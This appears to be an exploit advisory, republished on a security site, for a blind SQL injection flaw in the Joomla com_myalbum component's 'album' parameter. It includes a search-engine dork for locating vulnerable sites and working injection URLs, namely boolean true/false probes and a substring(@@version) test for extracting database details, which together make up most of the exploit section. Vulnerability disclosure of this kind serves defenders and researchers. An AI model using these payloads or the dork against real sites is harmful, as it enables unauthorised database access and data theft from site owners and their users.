Joomla Component com_myalbum Blind Injection Vulnerability

2013.05.12
Credit: AtT4CKxT3rR0r1ST
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"com_myalbum\"

Joomla Component com_myalbum Blind Injection Vulnerability ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Dork : inurl:"com_myalbum" .:. Script : http://joomlacode.org/gf/project/myalbum/ #################################################################### ===[ Exploit ]=== Blind Injection: ================ www.site.com/index.php?option=com_myalbum&album=1[injection] www.site.com/index.php?option=com_myalbum&album=1+and+1=1 >>> True www.site.com/index.php?option=com_myalbum&album=1+and+1=2 >>> False www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=5 >>> True www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=4 >>> False

References:

http://joomlacode.org/gf/project/myalbum/


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top